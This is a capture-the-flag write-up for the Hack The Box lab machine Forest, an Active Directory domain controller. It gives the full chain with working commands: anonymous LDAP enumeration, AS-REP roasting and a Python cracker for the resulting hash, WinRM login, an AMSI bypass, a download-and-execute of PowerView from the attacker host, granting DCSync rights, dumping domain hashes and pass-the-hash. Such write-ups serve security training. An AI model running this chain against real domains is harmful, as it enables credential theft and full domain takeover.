Forest

Enumeration

Defining a helper variable containing the IP and doing some basic enumeration:

export ip=10.10.10.161
ping -c 1 $ip            # TTL 127: one hop below the Windows default of 128
nmap -sC -sV -p- $ip
Port                                        Service        Notes
53                                          domain         Simple DNS Plus
88                                          kerberos-sec   Microsoft Windows Kerberos
135                                         msrpc          Microsoft Windows RPC
139                                         netbios-ssn    Microsoft Windows netbios-ssn
389                                         ldap           Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445                                         microsoft-ds   Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464                                         kpasswd5?
593                                         ncacn_http     Microsoft Windows RPC over HTTP 1.0
636                                         tcpwrapped
3268                                        ldap           Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269                                        tcpwrapped
5985                                        http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389                                        mc-nmf         .NET Message Framing
49664-49667,49671,49677,49684,49706,49943   msrpc          Microsoft Windows RPC
49676                                       ncacn_http     Microsoft Windows RPC over HTTP 1.0
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

DNS, Kerberos (88/464), LDAP on 389 and the global catalog on 3268 (636 and 3269 are the LDAPS equivalents), SMB and WinRM (5985) all on one host mark FOREST as a domain controller for htb.local, which is what the rest of the enumeration targets.

LDAP

ldapsearch can be used to test what the LDAP service exposes without authentication, starting with the RootDSE (an empty base DN with base scope):

ldapsearch -H ldap://$ip:389 -x -s base -b '' "(objectClass=*)" "*" +

This succeeds and returns the RootDSE entry. Note that the RootDSE is readable without a bind on any AD domain controller, so by itself it does not prove that anonymous access to the rest of the directory is allowed; its value is the naming contexts (DC=htb,DC=local), the DC name (FOREST.htb.local) and the functional levels (7 = Windows Server 2016), which the targeted queries below rely on. The anonymous user enumeration with windapsearch and JXplorer that follows is what confirms anonymous access to the domain naming context.

ldapsearch output:
# extended LDIF
#
# LDAPv3
# base  with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
currentTime: 20230722171608.0Z
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Nam
 e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
highestCommittedUSN: 4032460
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
dnsHostName: FOREST.htb.local
ldapServiceName: htb.local:forest$@HTB.LOCAL
serverName: CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
 uration,DC=htb,DC=local
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
isSynchronized: TRUE
isGlobalCatalogReady: TRUE
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

windapsearch is another tool which may be used to run arbitrary queries. The filter must be quoted, otherwise the shell interprets the parentheses, e.g.

./windapsearch-linux-amd64 --dc $ip -m custom --filter '(objectClass=*)'

A GUI alternative is JXplorer. Connecting it anonymously to the host and browsing the directory turns up a service account, svc-alfresco.

[JXplorer screenshot]

Researching this account shows, from the Alfresco documentation, that the account must have Kerberos pre-authentication disabled, which leaves it vulnerable to AS-REP roasting: without pre-authentication the KDC hands an AS-REP to anyone who asks for that user, and the reply's encrypted part can be cracked offline against the user's password. The condition can be confirmed directly in the directory: the account's userAccountControl attribute has the DONT_REQ_PREAUTH flag (0x400000) set.
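To make that check reproducible rather than a manual read in JXplorer, here is an added example (not part of the original write-up) that decodes the userAccountControl bit field and builds the LDAP filter that returns every enabled account with DONT_REQ_PREAUTH set, using the bitwise-AND extensible matching rule. The entries it runs against are constructed for illustration, and the svc-alfresco value 0x410200 is an assumed example rather than a value read from the lab. The final function, which runs the same filter against a live DC over an anonymous bind, needs the ldap3 package and network access and is not used by the rest of the block.

```python
"""Find AS-REP-roastable accounts from userAccountControl (added example)."""

# Relevant userAccountControl bits (MS-ADTS / MS-SAMR).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

# LDAP extensible-match rule OID for bitwise AND (LDAP_MATCHING_RULE_BIT_AND).
BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> list:
    """Return the names of the flags set in a userAccountControl value, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable_filter() -> str:
    """LDAP filter: user objects with DONT_REQ_PREAUTH set and ACCOUNTDISABLE clear."""
    return (
        "(&(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:{BIT_AND}:={DONT_REQ_PREAUTH})"
        f"(!(userAccountControl:{BIT_AND}:={ACCOUNTDISABLE})))"
    )


def select_roastable(entries: list) -> list:
    """Apply the same logic as the LDAP filter locally to a list of entries."""
    found = []
    for entry in entries:
        uac = entry["userAccountControl"]
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            found.append(entry["sAMAccountName"])
    return found


# Constructed sample entries; the values are illustrative, not data from the lab.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},  # assumed value
    {"sAMAccountName": "old-svc", "userAccountControl": 0x410202},  # pre-auth off, but disabled
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},
]


def find_asrep_roastable(dc_ip: str, base_dn: str) -> list:
    """Run the filter against a live DC over an anonymous simple bind (requires ldap3)."""
    import ldap3  # optional dependency; assumed to be installed when this is called

    server = ldap3.Server(dc_ip, port=389, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, auto_bind=True)  # no credentials: anonymous bind
    conn.search(base_dn, asrep_roastable_filter(),
                attributes=["sAMAccountName", "userAccountControl"])
    return [str(e.sAMAccountName) for e in conn.entries]


if __name__ == "__main__":
    print(asrep_roastable_filter())
    for e in SAMPLE_ENTRIES:
        print(e["sAMAccountName"], hex(e["userAccountControl"]), decode_uac(e["userAccountControl"]))
    print("roastable:", select_roastable(SAMPLE_ENTRIES))
```

The filter is the one to paste into windapsearch's --filter or into ldapsearch against the default naming context; the matching-rule OID is what makes the comparison a bit test rather than an equality check, which is the usual mistake when people write userAccountControl=4194304 and get nothing back.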

AS-REP Roasting - Crackable hash from the AS-REP

Impacket's GetNPUsers.py requests a TGT for the account without pre-authentication; because the account does not require it, the KDC answers with an AS-REP whose encrypted part is protected by a key derived from the user's password, and the tool prints that part in a crackable format:

./GetNPUsers.py -dc-ip 10.10.10.161 -no-pass htb.local/svc-alfresco

There is also a Metasploit module, auxiliary/scanner/kerberos/kerberos_login, that can perform the same function; however, at the time of writing it produced an incorrect hash for this lab.

Hash (the $23$ marks Kerberos etype 23, RC4-HMAC, so the key is the account's NT hash):

$krb5asrep$23$svc-alfresco@HTB.LOCAL:66855604810fbd254fd37bcca563f13e$302dfc2242406fd902c8f205bf6580761dab6909dd373cb409f77664d4176d3401f17bd6d51af64aa1f339ca2f13ed00921c6bd102420cecdeca0584cdcde7969cf208d98f5f85916989c285f673ce40c7e6d49280e7ad4d8a0816335ef654146996736a7dccf9694015e1ed5f44979142c49dbfd26db23cf1205950f26944bce63cbb579caa12e1fcefaf4d819cadd8289769f3af5614a86d61b3c3fa3973b754449f752690498293f00f7286351898d789e42ea2d4e85f11b6b1c65bf685bd5caa1ffd7d3ec3e4fbed67674adca7367ea30df77db8974e203a1fce1d361b0ec6bd87b8d8a6

Cracking this with john against rockyou yields the password s3rvice:

# use an editor to write the hash to a file named hash
john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
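What john is doing with that hash, shown as an added example that is not part of the original write-up: for each wordlist candidate it derives the NT hash (MD4 of the UTF-16LE password), which is the RC4-HMAC key for etype 23, decrypts the AS-REP encrypted part with key usage 8 as Windows does, and checks the HMAC-MD5 checksum that precedes the $ in the hash. The hash this block cracks is constructed inside the block from a known password so that it runs offline; it is not the lab's hash. MD4 is implemented inline because OpenSSL 3 builds of Python frequently do not expose it through hashlib.

```python
"""Verify or crack a $krb5asrep$23$ hash the way john/hashcat do (added example)."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
AS_REP_USAGE = 8  # key usage Windows applies to the AS-REP enc-part under RC4-HMAC


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is missing on many OpenSSL 3 builds."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0, list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        w = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for f, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                j = -i % 4  # the register written cycles a, d, c, b
                v[j] = rotl((v[j] + f(v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4])
                             + w[idx] + k) & MASK, shifts[i % 4])
        state = [(s + t) & MASK for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 this is the Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def parse_asrep_hash(h: str) -> dict:
    """Split $krb5asrep$23$user@REALM:checksum$edata into its fields."""
    parts = h.split("$")
    if parts[1] != "krb5asrep" or parts[2] != "23":
        raise ValueError("not an etype-23 AS-REP hash")
    principal, checksum = parts[3].split(":")
    user, realm = principal.split("@")
    return {"user": user, "realm": realm,
            "checksum": bytes.fromhex(checksum), "edata": bytes.fromhex(parts[4])}


def check_candidate(password: str, checksum: bytes, edata: bytes) -> bool:
    """RFC 4757 decrypt-then-verify: K1 = HMAC(K, usage), K3 = HMAC(K1, checksum)."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_USAGE))
    plaintext = rc4(hmac_md5(k1, checksum), edata)  # confounder || EncASRepPart
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)


def crack_asrep(h: str, wordlist):
    """Return the first wordlist entry that verifies, as john does with rockyou."""
    fields = parse_asrep_hash(h)
    for cand in wordlist:
        if check_candidate(cand, fields["checksum"], fields["edata"]):
            return cand
    return None


def build_asrep_hash(user, realm, password, plaintext, confounder=bytes(8)):
    """Constructed fixture: encrypt like the KDC would, under a known password."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_USAGE))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    edata = rc4(hmac_md5(k1, checksum), data)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"


# Constructed hash, not the lab's: a fake EncASRepPart body encrypted under "s3rvice".
CONSTRUCTED_HASH = build_asrep_hash("svc-alfresco", "HTB.LOCAL", "s3rvice",
                                    b"constructed EncASRepPart body, not a real ticket")

if __name__ == "__main__":
    print(crack_asrep(CONSTRUCTED_HASH, ["password", "Welcome1", "s3rvice"]))
```

Because the check is one MD4 plus three HMAC-MD5 and one RC4 per candidate, with no salt, the same hash is trivially reusable for any wordlist, which is why a roastable account with a dictionary password falls in seconds; it also means only the checksum half of the hash needs to be correct for the first filter, the decryption of the full encrypted part confirms it.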

With the password, a shell is available over the WinRM service (port 5985) using Evil-WinRM, which also recovers the user flag:

evil-winrm -i $ip -u svc-alfresco -p s3rvice
type ../Desktop/user.txt

BloodHound Enumeration

bloodhound-python collects the domain data over LDAP and SMB with the svc-alfresco credentials and writes JSON files; these are imported into the BloodHound GUI, which stores them in Neo4j (start Neo4j first). Once the data is loaded, the pre-built queries (for example Shortest Paths to Domain Admins) can be used to find a path for privilege escalation:

bloodhound-python -d htb.local -gc forest.htb.local -u svc-alfresco -p s3rvice -c all -ns 10.10.10.161
sudo neo4j start
bloodhound

BloodHound identifies a path to administrative privileges through a WriteDacl edge: svc-alfresco's nested group memberships give it Account Operators rights, which allow it to create accounts and add them to the Exchange Windows Permissions group, and that group holds WriteDacl over the domain object. WriteDacl means the object's ACL can be edited, so a new user can be created, added to the group and granted the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), i.e. DCSync, which lets it request every account's password hash from the domain controller.

[BloodHound screenshot]

Privilege Escalation

From within the Evil-WinRM session, create a domain user and place it in the group that holds WriteDacl over the domain object (Remote Management Users is optional; it only allows the new account to log in over WinRM itself):

net user hacker aaa111! /add /domain
net group "Exchange Windows Permissions" hacker /add
net localgroup "Remote Management Users" hacker /add

Evil-WinRM's built-in Bypass-4MSI (listed under menu) patches AMSI in the session so that PowerView can be loaded in memory without being blocked by Defender:

menu
Bypass-4MSI

Then load PowerView (part of PowerSploit) into the session to get Add-ObjectACL, an alias of Add-DomainObjectAcl. The script is served from the attacker machine, 10.10.14.11 here:

# on the attacker machine, from /usr/share/windows-resources/powersploit/Recon
sudo python -m http.server 80
# in the Evil-WinRM session
iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11/PowerView.ps1')

Finish configuring the new user with DCSync rights on the domain object. The -Credential is needed because the WinRM session runs as svc-alfresco, whose own token does not carry the WriteDacl right; the ACL change must be made as hacker, which is now a member of Exchange Windows Permissions. The target is given explicitly as the domain's distinguished name (from the ldapsearch output) so the ACE lands on the domain object rather than relying on the cmdlet's default target:

$pass = ConvertTo-SecureString 'aaa111!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\hacker', $pass)
Add-ObjectACL -TargetIdentity 'DC=htb,DC=local' -PrincipalIdentity hacker -Credential $cred -Rights DCSync

Impacket's secretsdump, here driven through its Metasploit wrapper, can now authenticate as hacker and dump the hashes. Because hacker holds the replication rights, the NTDS hashes come over DRSUAPI replication (DCSync); ExecMethod only matters for the local SAM/LSA secrets, which additionally require administrative access to the host:

msfconsole
use scanner/smb/impacket/secretsdump
set rhosts 10.10.10.161
set smbuser hacker
set smbpass aaa111!
set SMBDomain htb.local
set ExecMethod wmiexec
run

This returns hashes in the format domain\user:RID:LM hash:NT hash:::. The LM part aad3b435b51404eeaad3b435b51404ee is the well-known value of an empty LM hash (LM storage is disabled), so the NT hash is the usable half. The entry for the domain administrator is:

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

The NT hash alone is enough to authenticate with Impacket's psexec.py (pass-the-hash; the -hashes argument takes LM:NT, with the empty LM value in front), which gives a SYSTEM shell from which the root flag can be read:

./psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
type C:\Users\Administrator\Desktop\root.txt